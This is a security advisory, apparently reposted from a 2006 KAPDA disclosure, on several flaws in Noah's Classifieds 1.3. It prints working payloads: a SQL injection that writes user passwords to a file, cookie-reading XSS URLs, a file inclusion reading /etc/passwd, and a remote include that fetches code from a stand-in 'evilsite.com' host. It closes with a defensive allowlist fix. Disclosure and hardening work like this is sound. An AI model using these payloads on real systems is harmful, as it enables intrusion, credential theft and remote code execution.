Noah's classifieds multiple vulnerabilities

2006.02.23
Credit: trueend5
Risk: High
Local: Yes
Remote: Yes
CWE: N/A


Overall CVSS score: 6.4/10
Impact: 4.9/10
Exploitability: 10/10
Access required: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: Partial

KAPDA New advisory

Vendor: http://classifieds.phpoutsourcing.com
Vulnerable: Noah`s classifieds 1.3 and below (classifieds component for mambo also may be affected)
Bug: Path Disclosure, Sql Injection, XSS, Local file inclusion, Remote code execution
Exploitation: Remote with browser
Exploit: available

Description:
--------------------
Noah's Classifieds is a general purpose application that allows you to set up as many ad categories as you want, specifying custom fields for each of them.

Vulnerabilities:
--------------------
Path disclosure (direct access to include files)

http://example.com/classifieds/gorum/category.php

--------------------------
Sql Injection: (search tool, HTTP method: POST, condition: mysql user with file privilege)

kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'/**/FROM/**/classifieds_classifiedsuser#

--------------------------
Cross site scripting

1- http://example.com/classifieds/index.php?inf=%3Cscript%3Ealert(document.cookie)%3C/script%3E

/gorum/gorumlib.php
if( isset($HTTP_GET_VARS["inf"]) ) $infoText=$HTTP_GET_VARS["inf"];
$sApp=$init->showApp();
$s.=$globHtmlHead;//important that it can be overridden in the app

2- http://example.com/classifieds/index.php?upperTemplate=%3Cscript%3Ealert(document.cookie)%3C/script%3E (condition: register_globals=On)

--------------------------
Local file inclusion (condition: magic_quotes_gpc=Off for non-php files)

http://example.com/classifieds/index.php?otherTemplate=/../../../etc/passwd%00

/include.php
if (isset($otherTemplate))
{
    include("./template$otherTemplate.php");
}
else
    include("./template.php");

--------------------------
Remote code execution (condition: register_globals=On)

http://example.com/classifieds/index.php?lowerTemplate=http://evilsite.com/evilfile.php

/gorum/constants.php
if (!isset($upperTemplate)) $upperTemplate = "<body>\n";
if (!isset($lowerTemplate)) $lowerTemplate = "</body>";

/gorum/gorumlib.php
if (ereg(".php$",$upperTemplate)) {//just check
    $ret=@fopen($upperTemplate,"r");
    if (!$ret) {
        $infoText = sprintf($lll["incl_header_err"],$upperTemplate);
    }
    @fclose($f);
}
if (ereg(".php$",$lowerTemplate)) {//just check
    $ret=@fopen($lowerTemplate,"r");
    if (!$ret) {
        if (!isset($infoText)) $infoText="";
        $infoText.="<br>".sprintf($lll["incl_footer_err"],$lowerTemplate);
    }
    @fclose($f);
}
. . .
$upperTemplate=trim($upperTemplate);
if (ereg(".php$",$upperTemplate)) {
    $ret=@include($upperTemplate);
}
else $s.="$upperTemplate\n";
$lowerTemplate=trim($lowerTemplate);
$s.=$sApp;
if (ereg(".php$",$lowerTemplate)) $ret=@include($lowerTemplate);
else $s.="$lowerTemplate\n";
}

More details with Exploit
---------
http://www.kapda.ir/advisory-268.html
In Farsi: http://irannetjob.com/content/view/198/28/

Solution:
---------
There is no vendor supplied patch for this issue.
From Vendor's website:
"Currently, we are completely overloaded with our running projects, and we don't have enough time to deal with our free products. The further development and support of Noah's Classifieds is therefore suspended. Thank you for the understanding and please forgive us that we are not responding to the emails."

Credit:
---------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran [http://www.KAPDA.ir]
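Since no vendor patch exists, the following is an added example (not Noah's Classifieds code) of how the include.php / gorumlib.php template selection and the reflected "inf" message quoted above can be hardened: the request value is mapped through an allowlist instead of being concatenated into the include path, and the message is HTML-encoded before output. It assumes PHP 8, a ./templates/ directory, and the hypothetical template names listed in the array.

```php
<?php
// Added example, not Noah's Classifieds code: a hardened replacement for the
// include.php / gorumlib.php template selection quoted in the advisory.
// Assumed layout: templates live in ./templates/ under the names listed below.
declare(strict_types=1);
const TEMPLATE_DIR = __DIR__ . '/templates';
// Request value -> file name. Only these keys are ever mapped to a path, so
// "../", a NUL byte, or "http://" in the parameter can never reach include().
const TEMPLATES = [
    'default' => 'template.php',
    'compact' => 'template_compact.php',
    'print'   => 'template_print.php',
];

// Resolve a request-supplied name to an absolute path inside TEMPLATE_DIR,
// or return null when it is not an allowlisted key.
function resolveTemplate(mixed $requested): ?string
{
    $key = is_string($requested) && $requested !== '' ? $requested : 'default';
    if (!array_key_exists($key, TEMPLATES)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $real = realpath(TEMPLATE_DIR . '/' . TEMPLATES[$key]);
    // Defence in depth: the resolved file must still sit under TEMPLATE_DIR.
    if ($base === false || $real === false
        || !str_starts_with($real, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $real;
}

// Encode a reflected message for an HTML body context; reject non-strings.
function safeInfoText(mixed $value): string
{
    return is_string($value)
        ? htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        : '';
}

// Read explicitly from $_GET; never rely on register_globals-style variables.
$template = resolveTemplate($_GET['otherTemplate'] ?? null);
if ($template === null) {
    http_response_code(400);
    exit('Unknown template');
}
$infoText = safeInfoText($_GET['inf'] ?? null);
include $template;
```

The same allowlist approach applies to upperTemplate and lowerTemplate; pairing it with allow_url_include=Off and register_globals=Off removes the remote include path entirely.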


Copyright 2024, cxsecurity.com